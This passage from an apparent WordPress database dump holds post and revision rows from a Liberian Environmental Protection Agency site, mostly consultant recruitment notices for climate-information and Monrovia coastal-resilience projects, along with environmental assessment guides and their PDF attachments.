resilience, and adaptation into national development planning through effective climate information systems.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/02/M-E-Specialist.pdf\" target=\"_blank\" rel=\"noopener\">M &amp; E Specialist Wanted</a></em>','Call for Expression of Interest - Monitoring & Evaluation Specialist for CIS Project','','inherit','closed','closed','','4576-revision-v1','','','2022-03-18 13:39:46','2022-03-18 13:39:46','',4576,'https://ekmsliberia.info/?p=4598',0,'revision','',0),(4599,42,'2022-03-18 13:41:13','2022-03-18 13:41:13','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The overarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.\n\nLink:','Call for Expression of Interest - Hydrology Specialist for CIS Project','','inherit','closed','closed','','4573-autosave-v1','','','2022-03-18 13:41:13','2022-03-18 13:41:13','',4573,'https://ekmsliberia.info/?p=4599',0,'revision','',0),(4600,42,'2022-03-18 13:41:31','2022-03-18 13:41:31','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The overarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/02/Hydrology-Specialist-.pdf\" target=\"_blank\" rel=\"noopener\">Hydrology Specialist Wanted</a></em>','Call for Expression of Interest - Hydrology Specialist for CIS Project','','inherit','closed','closed','','4573-revision-v1','','','2022-03-18 13:41:31','2022-03-18 13:41:31','',4573,'https://ekmsliberia.info/?p=4600',0,'revision','',0),(4601,42,'2022-03-18 13:43:50','2022-03-18 13:43:50','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The\noverarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning18 through effective climate information systems.\n\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/02/Financial-Management-Specialist-.pdf\" target=\"_blank\" rel=\"noopener\">Financial Management Specialist Wanted</a></em>','Call for Expression of Interest - Financial Management Specialist for CIS Project','','inherit','closed','closed','','4569-autosave-v1','','','2022-03-18 13:43:50','2022-03-18 13:43:50','',4569,'https://ekmsliberia.info/?p=4601',0,'revision','',0),(4602,42,'2022-03-18 13:43:53','2022-03-18 13:43:53','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project. The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The\r\noverarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning18 through effective climate information systems.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/02/Financial-Management-Specialist-.pdf\" target=\"_blank\" rel=\"noopener\">Financial Management Specialist Wanted</a></em>','Call for Expression of Interest - Financial Management Specialist for CIS Project','','inherit','closed','closed','','4569-revision-v1','','','2022-03-18 13:43:53','2022-03-18 13:43:53','',4569,'https://ekmsliberia.info/?p=4602',0,'revision','',0),(4603,42,'2022-03-18 13:45:33','2022-03-18 13:45:33','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project: (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project.  The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The overarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.\n\n&nbsp;','Call for Expression of Interest To Provide Project Management Support to the Enhancing Climate Information System for Resilient Development in Liberia (CIS) Project','','inherit','closed','closed','','4561-autosave-v1','','','2022-03-18 13:45:33','2022-03-18 13:45:33','',4561,'https://ekmsliberia.info/?p=4603',0,'revision','',0),(4604,42,'2022-03-18 13:46:36','2022-03-18 13:46:36','The Government of Liberia through the Environmental Protection Agency in collaboration with the African Development Bank (AfDB) received funding from the Green Climate Fund (GCF) to implement the project: (Enhancing Climate Information Systems for Resilient Development in Liberia) otherwise referred to as CIS Project.  The objective of the project is to further strengthen Liberia’s climate-related observing and monitoring capabilities, early warning and early action systems, and other environmental-related information systems. It seeks to drive a paradigm shift towards evidence-based climate-informed decision-making, planning, and response. The overarching goal of the project is to integrate green growth, environmental resilience, and adaptation into national development planning through effective climate information systems.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/01/Final-ToR-CIS.-Proj.-Coord4131.pdf\">Project Coordinator Wanted</a></em>','Call for Expression of Interest - Project Coordinator for CIS Project','','inherit','closed','closed','','4561-revision-v1','','','2022-03-18 13:46:36','2022-03-18 13:46:36','',4561,'https://ekmsliberia.info/?p=4604',0,'revision','',0),(4608,42,'2022-04-20 08:54:01','2022-04-20 08:54:01','The Environmental Protection and Management Law (EPML) provides for a wide-ranging responsibility for the EPA to ensure the sustainable management of the environment and the natural resources thereof. One of the most important of all is the mandate of the EPA to develop administrative procedures for the preparation of the EIA/ESIA reports that would ensure effective environmental governance (Part III Section 10, EPML, 2003).','ESIA Revised Procedural Guide 2022','','publish','closed','closed','','esia-revised-procedural-guide-2022','','','2022-04-20 08:54:01','2022-04-20 08:54:01','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4608',61,'document','',0),(4609,42,'2022-04-20 08:53:05','2022-04-20 08:53:05','','Screenshot 2022-04-20 at 08-46-54 ESIA 2022 REVISED PROCEDURal GUIDE.pdf','','inherit','open','closed','','screenshot-2022-04-20-at-08-46-54-esia-2022-revised-procedural-guide-pdf','','','2022-04-20 08:53:05','2022-04-20 08:53:05','',4608,'https://ekmsliberia.info/wp-content/uploads/2022/04/Screenshot-2022-04-20-at-08-46-54-ESIA-2022-REVISED-PROCEDURal-GUIDE.pdf.png',0,'attachment','image/png',0),(4610,42,'2022-04-20 08:53:19','2022-04-20 08:53:19','','ESIA 2022 REVISED PROCEDURal GUIDE','','inherit','open','closed','','esia-2022-revised-procedural-guide','','','2022-04-20 08:53:19','2022-04-20 08:53:19','',4608,'https://ekmsliberia.info/wp-content/uploads/2022/04/ESIA-2022-REVISED-PROCEDURal-GUIDE.pdf',0,'attachment','application/pdf',0),(4611,42,'2022-04-20 08:54:01','2022-04-20 08:54:01','The Environmental Protection and Management Law (EPML) provides for a wide-ranging responsibility for the EPA to ensure the sustainable management of the environment and the natural resources thereof. One of the most important of all is the mandate of the EPA to develop administrative procedures for the preparation of the EIA/ESIA reports that would ensure effective environmental governance (Part III Section 10, EPML, 2003).','ESIA Revised Procedural Guide 2022','','inherit','closed','closed','','4608-revision-v1','','','2022-04-20 08:54:01','2022-04-20 08:54:01','',4608,'https://ekmsliberia.info/?p=4611',0,'revision','',0),(4612,42,'2022-04-20 09:04:03','2022-04-20 09:04:03','The Environmental Protection and Management Law (EPML) was concomitantly enacted to provide for the enforcement of the provisions of the EPA Act. Section 37 of said Act empowers the agency to require the conduct of environmental impact assessment by any proponent/project developer who intends to undertake any activity that may or may not have any significant impact on the environment. Section 29 of the EPML, which is in observance of Section 37 mentioned supra, empowers the agency to charge fees for the permitting processes and related administrative costs.','ESIA & SEA Revised Fees Regime 2021','','publish','closed','closed','','esia-sea-revised-fees-regime-2021','','','2022-04-20 09:04:03','2022-04-20 09:04:03','',0,'https://ekmsliberia.info/?post_type=document&#038;p=4612',60,'document','',0),(4613,42,'2022-04-20 09:03:04','2022-04-20 09:03:04','','Screenshot 2022-04-20 at 08-46-18 2021 Revised Fees regime for publication.pdf','','inherit','open','closed','','screenshot-2022-04-20-at-08-46-18-2021-revised-fees-regime-for-publication-pdf','','','2022-04-20 09:03:04','2022-04-20 09:03:04','',4612,'https://ekmsliberia.info/wp-content/uploads/2022/04/Screenshot-2022-04-20-at-08-46-18-2021-Revised-Fees-regime-for-publication.pdf.png',0,'attachment','image/png',0),(4614,42,'2022-04-20 09:03:21','2022-04-20 09:03:21','','2021 Revised Fees regime for publication','','inherit','open','closed','','2021-revised-fees-regime-for-publication','','','2022-04-20 09:03:21','2022-04-20 09:03:21','',4612,'https://ekmsliberia.info/wp-content/uploads/2022/04/2021-Revised-Fees-regime-for-publication.pdf',0,'attachment','application/pdf',0),(4615,42,'2022-04-20 09:04:03','2022-04-20 09:04:03','The Environmental Protection and Management Law (EPML) was concomitantly enacted to provide for the enforcement of the provisions of the EPA Act. Section 37 of said Act empowers the agency to require the conduct of environmental impact assessment by any proponent/project developer who intends to undertake any activity that may or may not have any significant impact on the environment. Section 29 of the EPML, which is in observance of Section 37 mentioned supra, empowers the agency to charge fees for the permitting processes and related administrative costs.','ESIA & SEA Revised Fees Regime 2021','','inherit','closed','closed','','4612-revision-v1','','','2022-04-20 09:04:03','2022-04-20 09:04:03','',4612,'https://ekmsliberia.info/?p=4615',0,'revision','',0),(4618,42,'2022-04-01 14:10:55','2022-04-01 14:10:55','<span id=\"page3R_mcid20\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), </span><span dir=\"ltr\" role=\"presentation\">through the United Nations Development Program (UNDP) and the Government of Liberia (GoL). </span><span dir=\"ltr\" role=\"presentation\">The core aim of the Project is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal communities in </span><span dir=\"ltr\" role=\"presentation\">Liberia by both addressing immediate adaptation priorities and cr</span><span dir=\"ltr\" role=\"presentation\">eating an enabling environment </span><span dir=\"ltr\" role=\"presentation\">for up</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">scaling coastal adaptation initiatives to other parts of Monrovia and Liberia. </span></span><span id=\"page3R_mcid21\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">As such, the MMCRP will address these vulnerabilities by: i) building a coastal revetment on</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">1050m of coastline at West Point</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">ensuring lan</span><span dir=\"ltr\" role=\"presentation\">dings for fishing boats (Output 1); ii) improving the </span><span dir=\"ltr\" role=\"presentation\">management of Liberia’s coastal zone by developing capacity for ICZM (Output 2); and iii) </span><span dir=\"ltr\" role=\"presentation\">supporting the development of gender</span><span dir=\"ltr\" role=\"presentation\">-</span> <span dir=\"ltr\" role=\"presentation\">and climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">sensitive livelihoods and improving the </span><span dir=\"ltr\" role=\"presentation\">resilience of climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">sensitive livelihoods in Monrovia (Output 3). The project is expected to </span><span dir=\"ltr\" role=\"presentation\">enhance coastal protection, foster improved coastal management and present local communities </span><span dir=\"ltr\" role=\"presentation\">with diversified climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">resilient livelihoods.</span></span>\r\n\r\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/EPA-Ads-for-Local-Consultant-1.pdf\" target=\"_blank\" rel=\"noopener\">Preparation of TOR </a></em>','Preparation of TOR for Construction Plan and Finalization of Design Specifications for Coastal Defense Structure','','publish','closed','closed','','preparation-of-tor-for-construction-plan-and-finalization-of-design-specifications-for-coastal-defense-structure','','','2022-04-22 11:22:13','2022-04-22 11:22:13','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4618',91,'ekms_bulletin','',0),(4620,42,'2022-04-21 14:14:53','2022-04-21 14:14:53','','EPA Ads for Local Consultant (1)','','inherit','open','closed','','epa-ads-for-local-consultant-1','','','2022-04-21 14:14:53','2022-04-21 14:14:53','',0,'https://ekmsliberia.info/wp-content/uploads/2022/04/EPA-Ads-for-Local-Consultant-1.pdf',0,'attachment','application/pdf',0),(4621,42,'2022-04-21 14:19:00','2022-04-21 14:19:00','<span id=\"page3R_mcid20\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), </span><span dir=\"ltr\" role=\"presentation\">through the United Nations Development Program (UNDP) and the Government of Liberia (GoL). </span><span dir=\"ltr\" role=\"presentation\">The core aim of the Project is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal communities in </span><span dir=\"ltr\" role=\"presentation\">Liberia by both addressing immediate adaptation priorities and cr</span><span dir=\"ltr\" role=\"presentation\">eating an enabling environment </span><span dir=\"ltr\" role=\"presentation\">for up</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">scaling coastal adaptation initiatives to other parts of Monrovia and Liberia. </span></span><span id=\"page3R_mcid21\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">As such, the MMCRP will address these vulnerabilities by: i) building a coastal revetment on</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">1050m of coastline at West Point</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">ensuring lan</span><span dir=\"ltr\" role=\"presentation\">dings for fishing boats (Output 1); ii) improving the </span><span dir=\"ltr\" role=\"presentation\">management of Liberia’s coastal zone by developing capacity for ICZM (Output 2); and iii) </span><span dir=\"ltr\" role=\"presentation\">supporting the development of gender</span><span dir=\"ltr\" role=\"presentation\">-</span> <span dir=\"ltr\" role=\"presentation\">and climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">sensitive livelihoods and improving the </span><span dir=\"ltr\" role=\"presentation\">resilience of climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">sensitive livelihoods in Monrovia (Output 3). The project is expected to </span><span dir=\"ltr\" role=\"presentation\">enhance coastal protection, foster improved coastal management and present local communities </span><span dir=\"ltr\" role=\"presentation\">with diversified climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">resilient livelihoods.</span></span>\r\n\r\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/ToR-for-developing-TORs_High-resolution-Multi-criteria-vulnerability-assessment-Activity-2.1.1.1_MMCRP-1_MME-Inputs.pdf\" target=\"_blank\" rel=\"noopener\">Preparation of TOR </a></em>','Preparation of TOR for Construction Plan and Finalization of Design Specifications for Coastal Defense Structure','','inherit','closed','closed','','4618-revision-v1','','','2022-04-21 14:19:00','2022-04-21 14:19:00','',4618,'https://ekmsliberia.info/?p=4621',0,'revision','',0),(4622,42,'2022-04-10 14:19:08','2022-04-10 14:19:08','<span id=\"page3R_mcid24\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), </span><span dir=\"ltr\" role=\"presentation\">through the United Nations Development Program (UNDP) and the Government of Liberia </span><span dir=\"ltr\" role=\"presentation\">(GoL). The core aim of the Project is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal </span><span dir=\"ltr\" role=\"presentation\">communities in Liberia by both addressing immediate adaptation priorities and cr</span><span dir=\"ltr\" role=\"presentation\">eating an </span><span dir=\"ltr\" role=\"presentation\">enabling environment for up</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">scaling coastal adaptation initiatives to other parts of Monrovia and </span><span dir=\"ltr\" role=\"presentation\">Liberia. <span id=\"page19R_mcid0\" class=\"markedContent\">As such, the MMCRP will address these vulnerabilities by: i) building a coastal revetment on<br role=\"presentation\" />1050m of coastline at West Point-ensuring landings for fishing boats (Output 1); ii) improving the management of Liberia’s coastal zone by developing capacity for ICZM (Output 2); and iii) supporting the development of gender- and climate-sensitive livelihoods and improving the resilience of climate-sensitive livelihoods in Monrovia (Output 3). The project is expected to enhance coastal protection, foster improved coastal management and present local communities with diversified climate-resilient livelihoods.</span>\r\n</span></span>\r\n\r\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/ToR-for-developing-TORs_High-resolution-Multi-criteria-vulnerability-assessment-Activity-2.1.1.1_MMCRP-1_MME-Inputs.pdf\" target=\"_blank\" rel=\"noopener\">Preparation of TOR</a></em>','Develop ToR for High-Resolution Multi-Criteria Vulnerability Assessment of the Liberian Coastline to Inform Development of the ICZMP','','publish','closed','closed','','develop-tor-for-high-resolution-multi-criteria-vulnerability-assessment-of-the-liberian-coastline-to-inform-development-of-the-iczmp','','','2022-04-21 14:24:34','2022-04-21 14:24:34','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4622',90,'ekms_bulletin','',0),(4623,42,'2022-04-21 14:22:34','2022-04-21 14:22:34','','ToR for developing TORs_High resolution Multi criteria vulnerability assessment (Activity 2.1.1.1)_MMCRP (1)_MME Inputs','','inherit','open','closed','','tor-for-developing-tors_high-resolution-multi-criteria-vulnerability-assessment-activity-2-1-1-1_mmcrp-1_mme-inputs','','','2022-04-21 14:22:34','2022-04-21 14:22:34','',0,'https://ekmsliberia.info/wp-content/uploads/2022/04/ToR-for-developing-TORs_High-resolution-Multi-criteria-vulnerability-assessment-Activity-2.1.1.1_MMCRP-1_MME-Inputs.pdf',0,'attachment','application/pdf',0),(4624,42,'2022-04-21 14:24:34','2022-04-21 14:24:34','<span id=\"page3R_mcid24\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), </span><span dir=\"ltr\" role=\"presentation\">through the United Nations Development Program (UNDP) and the Government of Liberia </span><span dir=\"ltr\" role=\"presentation\">(GoL). The core aim of the Project is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal </span><span dir=\"ltr\" role=\"presentation\">communities in Liberia by both addressing immediate adaptation priorities and cr</span><span dir=\"ltr\" role=\"presentation\">eating an </span><span dir=\"ltr\" role=\"presentation\">enabling environment for up</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">scaling coastal adaptation initiatives to other parts of Monrovia and </span><span dir=\"ltr\" role=\"presentation\">Liberia. <span id=\"page19R_mcid0\" class=\"markedContent\">As such, the MMCRP will address these vulnerabilities by: i) building a coastal revetment on<br role=\"presentation\" />1050m of coastline at West Point-ensuring landings for fishing boats (Output 1); ii) improving the management of Liberia’s coastal zone by developing capacity for ICZM (Output 2); and iii) supporting the development of gender- and climate-sensitive livelihoods and improving the resilience of climate-sensitive livelihoods in Monrovia (Output 3). The project is expected to enhance coastal protection, foster improved coastal management and present local communities with diversified climate-resilient livelihoods.</span>\r\n</span></span>\r\n\r\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/ToR-for-developing-TORs_High-resolution-Multi-criteria-vulnerability-assessment-Activity-2.1.1.1_MMCRP-1_MME-Inputs.pdf\" target=\"_blank\" rel=\"noopener\">Preparation of TOR</a></em>','Develop ToR for High-Resolution Multi-Criteria Vulnerability Assessment of the Liberian Coastline to Inform Development of the ICZMP','','inherit','closed','closed','','4622-revision-v1','','','2022-04-21 14:24:34','2022-04-21 14:24:34','',4622,'https://ekmsliberia.info/?p=4624',0,'revision','',0),(4625,42,'2022-04-21 14:25:28','2022-04-21 14:25:28','<span id=\"page3R_mcid20\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Monrovia </span><span dir=\"ltr\" role=\"presentation\">Metropolitan Climate Resilience Project (MMCRP), financed by the Green Climate Fund (GCF), </span><span dir=\"ltr\" role=\"presentation\">through the United Nations Development Program (UNDP) and the Government of Liberia (GoL). </span><span dir=\"ltr\" role=\"presentation\">The core aim of the Project is to build the long</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">term climate resilience of coastal communities in </span><span dir=\"ltr\" role=\"presentation\">Liberia by both addressing immediate adaptation priorities and cr</span><span dir=\"ltr\" role=\"presentation\">eating an enabling environment </span><span dir=\"ltr\" role=\"presentation\">for up</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">scaling coastal adaptation initiatives to other parts of Monrovia and Liberia. </span></span><span id=\"page3R_mcid21\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">As such, the MMCRP will address these vulnerabilities by: i) building a coastal revetment on</span><br role=\"presentation\" /><span dir=\"ltr\" role=\"presentation\">1050m of coastline at West Point</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">ensuring lan</span><span dir=\"ltr\" role=\"presentation\">dings for fishing boats (Output 1); ii) improving the </span><span dir=\"ltr\" role=\"presentation\">management of Liberia’s coastal zone by developing capacity for ICZM (Output 2); and iii) </span><span dir=\"ltr\" role=\"presentation\">supporting the development of gender</span><span dir=\"ltr\" role=\"presentation\">-</span> <span dir=\"ltr\" role=\"presentation\">and climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">sensitive livelihoods and improving the </span><span dir=\"ltr\" role=\"presentation\">resilience of climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">sensitive livelihoods in Monrovia (Output 3). The project is expected to </span><span dir=\"ltr\" role=\"presentation\">enhance coastal protection, foster improved coastal management and present local communities </span><span dir=\"ltr\" role=\"presentation\">with diversified climate</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">resilient livelihoods.</span></span>\r\n\r\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/EPA-Ads-for-Local-Consultant-1.pdf\" target=\"_blank\" rel=\"noopener\">Preparation of TOR </a></em>','Preparation of TOR for Construction Plan and Finalization of Design Specifications for Coastal Defense Structure','','inherit','closed','closed','','4618-revision-v1','','','2022-04-21 14:25:28','2022-04-21 14:25:28','',4618,'https://ekmsliberia.info/?p=4625',0,'revision','',0),(4626,42,'2022-04-22 11:20:33','2022-04-22 11:20:33','','EPA Ads for Local Consultant (1)','','inherit','open','closed','','epa-ads-for-local-consultant-1-2','','','2022-04-22 11:20:33','2022-04-22 11:20:33','',0,'https://ekmsliberia.info/wp-content/uploads/2022/04/EPA-Ads-for-Local-Consultant-1-1.pdf',0,'attachment','application/pdf',0),(4627,42,'2022-02-04 15:08:28','2022-02-04 15:08:28','<span id=\"page3R_mcid15\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The objective of the consultancy is to draft an updated National Capacity Self-Assessment reflecting post 2015- Sustainable Development Goals </span><span dir=\"ltr\" role=\"presentation\">and the latest opportunities to strengthen priority foundational capacities for the global environment. The previous assessment was undertaken </span><span dir=\"ltr\" role=\"presentation\">in 2006, and serves as a basis for the present project to strengthen targeted capacities. However, in the decade since the NCSA was undertaken, </span><span dir=\"ltr\" role=\"presentation\">there have been a number of important policy and institutional changes that have emerged as a basis of the change in political leadership. The </span><span dir=\"ltr\" role=\"presentation\">updating of the NCSA will serve as an opportunity to reconcile and update the current capacity challenges necessary to suppor</span><span dir=\"ltr\" role=\"presentation\">t the government’s </span><span dir=\"ltr\" role=\"presentation\">pursuit of sustainable development in tandem with the fulfillment of Rio Convention obligations. This process is the finalization phase of the </span><span dir=\"ltr\" role=\"presentation\">project.</span></span>\r\n\r\n<em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-Consultancy-to-draft-updated-National-Capacity-Self-Assessment-Final-Report.pdf\" target=\"_blank\" rel=\"noopener\">National Consultant Wanted</a></em>\r\n\r\n&nbsp;','National Consultant Wanted to Draft Updated National Capacity Self-Assessment Final Report for Cross-Cutting Capacity Development Project.','','publish','closed','closed','','national-consultant-wanted-to-draft-updated-national-capacity-self-assessment-final-report-for-cross-cutting-capacity-development-project','','','2022-04-22 15:22:20','2022-04-22 15:22:20','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4627',89,'ekms_bulletin','',0),(4628,42,'2022-04-22 15:12:56','2022-04-22 15:12:56','','Request for Expression of Interest for Consultancy to draft updated National Capacity Self-Assessment Final Report','','inherit','open','closed','','request-for-expression-of-interest-for-consultancy-to-draft-updated-national-capacity-self-assessment-final-report','','','2022-04-22 15:12:56','2022-04-22 15:12:56','',0,'https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-Consultancy-to-draft-updated-National-Capacity-Self-Assessment-Final-Report.pdf',0,'attachment','application/pdf',0),(4629,42,'2022-04-22 15:13:00','2022-04-22 15:13:00','','Request for Expression of Interest for National Consultant to Prepare a Lessons learned study on the piloting of an environmental awareness module into school curricula','','inherit','open','closed','','request-for-expression-of-interest-for-national-consultant-to-prepare-a-lessons-learned-study-on-the-piloting-of-an-environmental-awareness-module-into-school-curricula','','','2022-04-22 15:13:00','2022-04-22 15:13:00','',0,'https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-National-Consultant-to-Prepare-a-Lessons-learned-study-on-the-piloting-of-an-environmental-awareness-module-into-school-curricula.pdf',0,'attachment','application/pdf',0),(4630,42,'2022-04-22 15:13:04','2022-04-22 15:13:04','','Request for Expression of Interest for National Consultant to draft and validate guidelines for coordinated monitoring and compliance of global environment','','inherit','open','closed','','request-for-expression-of-interest-for-national-consultant-to-draft-and-validate-guidelines-for-coordinated-monitoring-and-compliance-of-global-environment','','','2022-04-22 15:13:04','2022-04-22 15:13:04','',0,'https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-for-National-Consultant-to-draft-and-validate-guidelines-for-coordinated-monitoring-and-compliance-of-global-environment.pdf',0,'attachment','application/pdf',0),(4631,42,'2022-04-22 15:13:07','2022-04-22 15:13:07','','Request for Expresion of Interest preparation of technical guidance materials for planners and other usersof indicators relevant to global environment','','inherit','open','closed','','request-for-expresion-of-interest-preparation-of-technical-guidance-materials-for-planners-and-other-usersof-indicators-relevant-to-global-environment','','','2022-04-22 15:13:07','2022-04-22 15:13:07','',0,'https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expresion-of-Interest-preparation-of-technical-guidance-materials-for-planners-and-other-usersof-indicators-relevant-to-global-environment.pdf',0,'attachment','application/pdf',0),(4632,42,'2022-04-22 15:13:10','2022-04-22 15:13:10','','Request for Expression of Interest to air jingles and Public Service Announcement','','inherit','open','closed','','request-for-expression-of-interest-to-air-jingles-and-public-service-announcement','','','2022-04-22 15:13:10','2022-04-22 15:13:10','',0,'https://ekmsliberia.info/wp-content/uploads/2022/04/Request-for-Expression-of-Interest-to-air-jingles-and-Public-Service-Announcement.pdf',0,'attachment','application/pdf',0),(4633,42,'2022-04-22 15:13:14','2022-04-22 15:13:14','','EPA Ads for Local Consultant (1)','','inherit','open','closed','','epa-ads-for-local-consultant-1-3','','','2022-04-22 15:13:14','2022-04-22 15:13:14','',0,'https://ekmsliberia.info/wp-content/uploads/2022/04/EPA-Ads-for-Local-Consultant-1-2.pdf',0,'attachment','application/pdf',0),(4634,42,'2022-04-22 15:22:20','2022-04-22 15:22:20','<span id=\"page3R_mcid15\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The objective of the consultancy is to draft an updated National Capacity Self-Assessment reflecting post 2015- Sustainable Development Goals </span><span dir=\"ltr\" role=\"presentation\">and the latest opportunities to strengthen priority foundational capacities for the global environment. The previous assessment was undertaken </span><span dir=\"ltr\" role=\"presentation\">in 2006, and serves as a basis for the present project to strengthen targeted capacities. However, in the decade since the NCSA was undertaken, </span><span dir=\"ltr\" role=\"presentation\">there have been a number of important policy and institutional changes that have emerged as a basis of the change in political leadership. The </span><span dir=\"ltr\" role=\"presentation\">updating of the NCSA will serve as an opportunity to reconcile and update the current capacity challenges necessary to suppor</span><span dir=\"ltr\" role=\"presentation\">t the government’s </span><span dir=\"ltr\" role=\"presentation\">pursuit of sustainable development in tandem with the fulfillment of Rio Convention obligations. This process is the finalization phase of the </span><span dir=\"ltr\" 